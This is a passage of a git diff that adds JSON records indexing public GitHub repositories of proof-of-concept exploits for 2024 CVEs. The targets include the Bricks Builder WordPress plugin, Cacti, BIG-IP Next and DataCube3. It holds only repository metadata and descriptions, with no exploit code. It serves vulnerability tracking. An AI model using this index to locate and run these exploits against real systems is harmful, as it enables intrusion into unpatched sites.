"watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25466.json b/2024/CVE-2024-25466.json new file mode 100644 index 0000000000..a6dc330dcf --- /dev/null +++ b/2024/CVE-2024-25466.json @@ -0,0 +1,33 @@ +[ + { + "id": 757892016, + "name": "CVE-2024-25466", + "full_name": "FixedOctocat\/CVE-2024-25466", + "owner": { + "login": "FixedOctocat", + "id": 43385721, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43385721?v=4", + "html_url": "https:\/\/github.com\/FixedOctocat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FixedOctocat\/CVE-2024-25466", + "description": "Description for CVE-2024-25466", + "fork": false, + "created_at": "2024-02-15T07:47:14Z", + "updated_at": "2024-02-15T07:47:14Z", + "pushed_at": "2024-02-15T12:41:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25503.json b/2024/CVE-2024-25503.json new file mode 100644 index 0000000000..5c519dd83a --- /dev/null +++ b/2024/CVE-2024-25503.json @@ -0,0 +1,33 @@ +[ + { + "id": 853175455, + "name": "CVE-2024-25503", + "full_name": "EQSTLab\/CVE-2024-25503", + "owner": { + "login": "EQSTLab", + "id": 148991397, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148991397?v=4", + "html_url": "https:\/\/github.com\/EQSTLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EQSTLab\/CVE-2024-25503", + "description": "PoC for CVE-2024-25503", + "fork": false, + "created_at": "2024-09-06T06:17:18Z", + "updated_at": "2024-09-06T06:17:39Z", + "pushed_at": "2024-09-06T06:17:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25600.json b/2024/CVE-2024-25600.json new file mode 100644 index 0000000000..b6395cf4b1 --- /dev/null +++ b/2024/CVE-2024-25600.json @@ -0,0 +1,392 @@ +[ + { + "id": 760768451, + "name": "CVE-2024-25600", + "full_name": "Chocapikk\/CVE-2024-25600", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2024-25600", + "description": "Unauthenticated Remote Code Execution – Bricks <= 1.9.6", + "fork": false, + "created_at": "2024-02-20T20:16:09Z", + "updated_at": "2024-11-24T11:00:29Z", + "pushed_at": "2024-02-25T21:50:09Z", + "stargazers_count": 149, + "watchers_count": 149, + "has_discussions": false, + "forks_count": 33, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 33, + "watchers": 149, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 760947792, + "name": "CVE-2024-25600_Nuclei-Template", + "full_name": "Christbowel\/CVE-2024-25600_Nuclei-Template", + "owner": { + "login": "Christbowel", + "id": 96427513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96427513?v=4", + "html_url": "https:\/\/github.com\/Christbowel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Christbowel\/CVE-2024-25600_Nuclei-Template", + "description": "Nuclei template and information about the POC for CVE-2024-25600", + "fork": false, + "created_at": "2024-02-21T00:27:33Z", + "updated_at": "2024-05-02T09:00:41Z", + "pushed_at": "2024-02-21T02:11:08Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 761713470, + "name": "CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "full_name": "Tornad0007\/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "owner": { + "login": "Tornad0007", + "id": 93181695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93181695?v=4", + "html_url": "https:\/\/github.com\/Tornad0007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tornad0007\/CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "description": "This tool is designed to exploit the CVE-2024-25600 vulnerability found in the Bricks Builder plugin for WordPress. The vulnerability allows for unauthenticated remote code execution on affected websites. The tool automates the exploitation process by retrieving nonces and sending specially crafted requests to execute arbitrary commands.", + "fork": false, + "created_at": "2024-02-22T10:53:45Z", + "updated_at": "2024-08-26T06:01:17Z", + "pushed_at": "2024-02-22T10:54:26Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 765397075, + "name": "CVE-2024-25600-wordpress-Exploit-RCE", + "full_name": "hy011121\/CVE-2024-25600-wordpress-Exploit-RCE", + "owner": { + "login": "hy011121", + "id": 75035965, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75035965?v=4", + "html_url": "https:\/\/github.com\/hy011121", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hy011121\/CVE-2024-25600-wordpress-Exploit-RCE", + "description": "(Mirorring)", + "fork": false, + "created_at": "2024-02-29T20:53:42Z", + "updated_at": "2024-06-16T18:49:22Z", + "pushed_at": "2024-02-29T21:04:40Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 765618070, + "name": "CVE-2024-25600-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-25600-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-25600-EXPLOIT", + "description": "A PoC exploit for CVE-2024-25600 - WordPress Bricks Builder Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-03-01T09:28:08Z", + "updated_at": "2024-11-11T13:03:49Z", + "pushed_at": "2024-03-01T09:46:56Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bricks-builder", + "cve-2024-25600", + "educational", + "exploit", + "exploitation", + "exploits", + "hacking", + "poc", + "rce", + "remote-code-execution", + "security-research", + "security-researcher", + "vulnerabilities", + "vulnerability", + "word", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 7, + "watchers": 27, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 789293414, + "name": "WORDPRESS-CVE-2024-25600-EXPLOIT-RCE", + "full_name": "X-Projetion\/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE", + "owner": { + "login": "X-Projetion", + "id": 161194427, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/161194427?v=4", + "html_url": "https:\/\/github.com\/X-Projetion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Projetion\/WORDPRESS-CVE-2024-25600-EXPLOIT-RCE", + "description": "WORDPRESS-CVE-2024-25600-EXPLOIT-RCE - WordPress Bricks Builder Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-04-20T06:36:22Z", + "updated_at": "2024-04-20T06:52:25Z", + "pushed_at": "2024-04-20T06:37:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801882404, + "name": "CVE-2024-25600-mass", + "full_name": "svchostmm\/CVE-2024-25600-mass", + "owner": { + "login": "svchostmm", + "id": 169925884, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169925884?v=4", + "html_url": "https:\/\/github.com\/svchostmm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/svchostmm\/CVE-2024-25600-mass", + "description": null, + "fork": false, + "created_at": "2024-05-17T05:23:51Z", + "updated_at": "2024-05-17T05:23:51Z", + "pushed_at": "2024-05-05T02:22:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 809314858, + "name": "0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "full_name": "ivanbg2004\/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "owner": { + "login": "ivanbg2004", + "id": 124943966, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/124943966?v=4", + "html_url": "https:\/\/github.com\/ivanbg2004", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ivanbg2004\/0BL1V10N-CVE-2024-25600-Bricks-Builder-plugin-for-WordPress", + "description": "0BL1V10N's CVE-2024-25600 for Bricks Builder (TryHackMe) plugin for WordPress exploit", + "fork": false, + "created_at": "2024-06-02T10:49:03Z", + "updated_at": "2024-11-20T16:30:48Z", + "pushed_at": "2024-06-02T11:12:04Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": true, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811133087, + "name": "CVE-2024-25600", + "full_name": "k3lpi3b4nsh33\/CVE-2024-25600", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-25600", + "description": null, + "fork": false, + "created_at": "2024-06-06T02:13:06Z", + "updated_at": "2024-06-06T02:36:13Z", + "pushed_at": "2024-06-06T02:36:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811160191, + "name": "CVE-2024-25600", + "full_name": "WanLiChangChengWanLiChang\/CVE-2024-25600", + "owner": { + "login": "WanLiChangChengWanLiChang", + "id": 171075497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4", + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-25600", + "description": null, + "fork": false, + "created_at": "2024-06-06T03:59:06Z", + "updated_at": "2024-06-07T17:15:46Z", + "pushed_at": "2024-06-07T17:15:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 835649473, + "name": "CVE-2024-25600-Bricks-Builder-WordPress", + "full_name": "KaSooMi0228\/CVE-2024-25600-Bricks-Builder-WordPress", + "owner": { + "login": "KaSooMi0228", + "id": 171640266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171640266?v=4", + "html_url": "https:\/\/github.com\/KaSooMi0228", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KaSooMi0228\/CVE-2024-25600-Bricks-Builder-WordPress", + "description": null, + "fork": false, + "created_at": "2024-07-30T09:02:31Z", + "updated_at": "2024-07-30T09:04:34Z", + "pushed_at": "2024-07-30T09:04:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 845015155, + "name": "CVE-2024-25600", + "full_name": "wh6amiGit\/CVE-2024-25600", + "owner": { + "login": "wh6amiGit", + "id": 121056021, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121056021?v=4", + "html_url": "https:\/\/github.com\/wh6amiGit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wh6amiGit\/CVE-2024-25600", + "description": "Unauthenticated Remote Code Execution – Bricks", + "fork": false, + "created_at": "2024-08-20T12:18:58Z", + "updated_at": "2024-08-20T14:40:21Z", + "pushed_at": "2024-08-20T13:57:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25641.json b/2024/CVE-2024-25641.json new file mode 100644 index 0000000000..0dab4601fa --- /dev/null +++ b/2024/CVE-2024-25641.json @@ -0,0 +1,174 @@ +[ + { + "id": 847752853, + "name": "CVE-2024-25641", + "full_name": "5ma1l\/CVE-2024-25641", + "owner": { + "login": "5ma1l", + "id": 111578568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111578568?v=4", + "html_url": "https:\/\/github.com\/5ma1l", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5ma1l\/CVE-2024-25641", + "description": "This repository automates the process of exploiting CVE-2024-25641 on Cacti 1.2.26", + "fork": false, + "created_at": "2024-08-26T13:34:35Z", + "updated_at": "2024-09-12T10:30:25Z", + "pushed_at": "2024-09-05T11:52:22Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "cacti", + "cve-2024-25641", + "exploit", + "penetration-testing", + "python3" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848016259, + "name": "CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26", + "full_name": "thisisveryfunny\/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26", + "owner": { + "login": "thisisveryfunny", + "id": 179417827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179417827?v=4", + "html_url": "https:\/\/github.com\/thisisveryfunny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thisisveryfunny\/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26", + "description": "CVE-2024-25641 - RCE Automated Exploit - Cacti 1.2.26", + "fork": false, + "created_at": "2024-08-27T01:19:25Z", + "updated_at": "2024-11-20T16:31:02Z", + "pushed_at": "2024-08-28T18:46:58Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 848376459, + "name": "CVE-2024-25641", + "full_name": "Safarchand\/CVE-2024-25641", + "owner": { + "login": "Safarchand", + "id": 38681779, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38681779?v=4", + "html_url": "https:\/\/github.com\/Safarchand", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Safarchand\/CVE-2024-25641", + "description": "PoC for CVE-2024-25641 Authenticated RCE on Cacti v1.2.26", + "fork": false, + "created_at": "2024-08-27T16:41:39Z", + "updated_at": "2024-09-01T04:05:36Z", + "pushed_at": "2024-09-01T04:05:33Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cacti", + "cve-2024-25641", + "exploit", + "explotation", + "poc", + "proof-of-concept", + "python3", + "rce", + "rce-exploit" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849191274, + "name": "CVE-2024-25641-CACTI-RCE-1.2.26", + "full_name": "StopThatTalace\/CVE-2024-25641-CACTI-RCE-1.2.26", + "owner": { + "login": "StopThatTalace", + "id": 117742366, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117742366?v=4", + "html_url": "https:\/\/github.com\/StopThatTalace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/StopThatTalace\/CVE-2024-25641-CACTI-RCE-1.2.26", + "description": "Fully automated PoC - CVE-2024-25641 - RCE - Cacti < v1.2.26 🌵", + "fork": false, + "created_at": "2024-08-29T06:27:25Z", + "updated_at": "2024-10-26T23:01:48Z", + "pushed_at": "2024-09-03T05:21:04Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892647431, + "name": "cve-2024-25641-poc", + "full_name": "XiaomingX\/cve-2024-25641-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-25641-poc", + "description": "PoC for CVE-2024-25641 Authenticated RCE on Cacti v1.2.26", + "fork": false, + "created_at": "2024-11-22T14:05:37Z", + "updated_at": "2024-11-22T14:09:19Z", + "pushed_at": "2024-11-22T14:09:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25723.json b/2024/CVE-2024-25723.json new file mode 100644 index 0000000000..de0f5d141b --- /dev/null +++ b/2024/CVE-2024-25723.json @@ -0,0 +1,33 @@ +[ + { + "id": 774682652, + "name": "exploit-CVE-2024-25723", + "full_name": "david-botelho-mariano\/exploit-CVE-2024-25723", + "owner": { + "login": "david-botelho-mariano", + "id": 48680041, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48680041?v=4", + "html_url": "https:\/\/github.com\/david-botelho-mariano", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/david-botelho-mariano\/exploit-CVE-2024-25723", + "description": null, + "fork": false, + "created_at": "2024-03-20T01:28:09Z", + "updated_at": "2024-11-20T16:30:42Z", + "pushed_at": "2024-04-02T20:05:58Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25731.json b/2024/CVE-2024-25731.json new file mode 100644 index 0000000000..b8f74f5a89 --- /dev/null +++ b/2024/CVE-2024-25731.json @@ -0,0 +1,35 @@ +[ + { + "id": 753419294, + "name": "com.cn.dq.ipc", + "full_name": "actuator\/com.cn.dq.ipc", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.cn.dq.ipc", + "description": "CVE-2024-25731", + "fork": false, + "created_at": "2024-02-06T04:38:12Z", + "updated_at": "2024-09-26T23:51:13Z", + "pushed_at": "2024-09-26T23:51:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-25731" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25733.json b/2024/CVE-2024-25733.json new file mode 100644 index 0000000000..2470b3c1ee --- /dev/null +++ b/2024/CVE-2024-25733.json @@ -0,0 +1,33 @@ +[ + { + "id": 783055366, + "name": "ARC-Browser-Address-Bar-Spoofing-PoC", + "full_name": "hackintoanetwork\/ARC-Browser-Address-Bar-Spoofing-PoC", + "owner": { + "login": "hackintoanetwork", + "id": 83481196, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83481196?v=4", + "html_url": "https:\/\/github.com\/hackintoanetwork", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hackintoanetwork\/ARC-Browser-Address-Bar-Spoofing-PoC", + "description": "CVE-2024-25733 | ARC Browser Address Bar Spoofing PoC - iOS\/iPadOS", + "fork": false, + "created_at": "2024-04-06T20:18:15Z", + "updated_at": "2024-10-23T14:48:12Z", + "pushed_at": "2024-04-06T20:37:23Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25809.json b/2024/CVE-2024-25809.json new file mode 100644 index 0000000000..43458f2519 --- /dev/null +++ b/2024/CVE-2024-25809.json @@ -0,0 +1,33 @@ +[ + { + "id": 758901582, + "name": "CVE-2024-25809", + "full_name": "sajaljat\/CVE-2024-25809", + "owner": { + "login": "sajaljat", + "id": 142223862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4", + "html_url": "https:\/\/github.com\/sajaljat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sajaljat\/CVE-2024-25809", + "description": "(XSS)", + "fork": false, + "created_at": "2024-02-17T12:16:29Z", + "updated_at": "2024-02-17T12:16:29Z", + "pushed_at": "2024-02-17T12:17:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25832.json b/2024/CVE-2024-25832.json new file mode 100644 index 0000000000..1749d9b509 --- /dev/null +++ b/2024/CVE-2024-25832.json @@ -0,0 +1,42 @@ +[ + { + "id": 767883110, + "name": "CVE-2024-25832-PoC", + "full_name": "0xNslabs\/CVE-2024-25832-PoC", + "owner": { + "login": "0xNslabs", + "id": 122338332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122338332?v=4", + "html_url": "https:\/\/github.com\/0xNslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xNslabs\/CVE-2024-25832-PoC", + "description": "PoC Script for CVE-2024-25832: Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload in DataCube3", + "fork": false, + "created_at": "2024-03-06T04:11:59Z", + "updated_at": "2024-03-20T18:09:07Z", + "pushed_at": "2024-03-06T04:32:54Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve", + "cve-2024-25830", + "cve-2024-25832", + "exploit", + "iot-security", + "reverse-shell", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-25897.json b/2024/CVE-2024-25897.json new file mode 100644 index 0000000000..ee34cbc857 --- /dev/null +++ b/2024/CVE-2024-25897.json @@ -0,0 +1,33 @@ +[ + { + "id": 839988308, + "name": "CVE-2024-25897", + "full_name": "i-100-user\/CVE-2024-25897", + "owner": { + "login": "i-100-user", + "id": 171415197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171415197?v=4", + "html_url": "https:\/\/github.com\/i-100-user", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/i-100-user\/CVE-2024-25897", + "description": "exploit que vulnera Jenkins hecho en Python ", + "fork": false, + "created_at": "2024-08-08T18:21:44Z", + "updated_at": "2024-11-20T16:31:00Z", + "pushed_at": "2024-08-09T00:09:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26026.json b/2024/CVE-2024-26026.json new file mode 100644 index 0000000000..b4080ba1b0 --- /dev/null +++ b/2024/CVE-2024-26026.json @@ -0,0 +1,64 @@ +[ + { + "id": 798069514, + "name": "CVE-2024-26026", + "full_name": "passwa11\/CVE-2024-26026", + "owner": { + "login": "passwa11", + "id": 112363374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4", + "html_url": "https:\/\/github.com\/passwa11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/passwa11\/CVE-2024-26026", + "description": "CVE-2024-26026: BIG-IP Next Central Manager API UNAUTHENTICATED SQL INJECTION", + "fork": false, + "created_at": "2024-05-09T03:14:14Z", + "updated_at": "2024-06-26T02:14:55Z", + "pushed_at": "2024-05-09T03:15:03Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 800194422, + "name": "Big-IP-Next-CVE-2024-26026", + "full_name": "GRTMALDET\/Big-IP-Next-CVE-2024-26026", + "owner": { + "login": "GRTMALDET", + "id": 129352872, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129352872?v=4", + "html_url": "https:\/\/github.com\/GRTMALDET", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/GRTMALDET\/Big-IP-Next-CVE-2024-26026", + "description": null, + "fork": false, + "created_at": "2024-05-13T22:04:01Z", + "updated_at": "2024-05-13T22:06:08Z", + "pushed_at": "2024-05-13T22:06:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26144.json b/2024/CVE-2024-26144.json new file mode 100644 index 0000000000..01bc0738c5 --- /dev/null +++ b/2024/CVE-2024-26144.json @@ -0,0 +1,33 @@ +[ + { + "id": 805249288, + "name": "CVE-2024-26144-test", + "full_name": "gmo-ierae\/CVE-2024-26144-test", + "owner": { + "login": "gmo-ierae", + "id": 137259531, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137259531?v=4", + "html_url": "https:\/\/github.com\/gmo-ierae", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmo-ierae\/CVE-2024-26144-test", + "description": null, + "fork": false, + "created_at": "2024-05-24T07:26:40Z", + "updated_at": "2024-07-08T07:47:42Z", + "pushed_at": "2024-07-03T01:09:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 11 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-26160.json b/2024/CVE-2024-26160.json new file mode 100644 index 0000000000..4450b9b75b --- /dev/null +++ b/2024/CVE-2024-26160.json @@ -0,0 +1,35 @@ +[ + { + "id": 867371823, + "name": "CVE-2024-26160", + "full_name": "xsh3llsh0ck\/CVE-2024-26160", + "owner": { + "login": "xsh3llsh0ck", + "id": 45564102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45564102?v=4", + "html_url": "https:\/\/github.com\/xsh3llsh0ck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xsh3llsh0ck\/CVE-2024-26160", + "description": "cldflt.sys information disclosure vulnerability (KB5034765 - KB5035853, Win 11).", + "fork": false, + "created_at": "2024-10-04T00:04:42Z", + "updated_at": "2024-11-05T19:46:32Z", + "pushed_at": "2024-10-04T00:14:36Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, 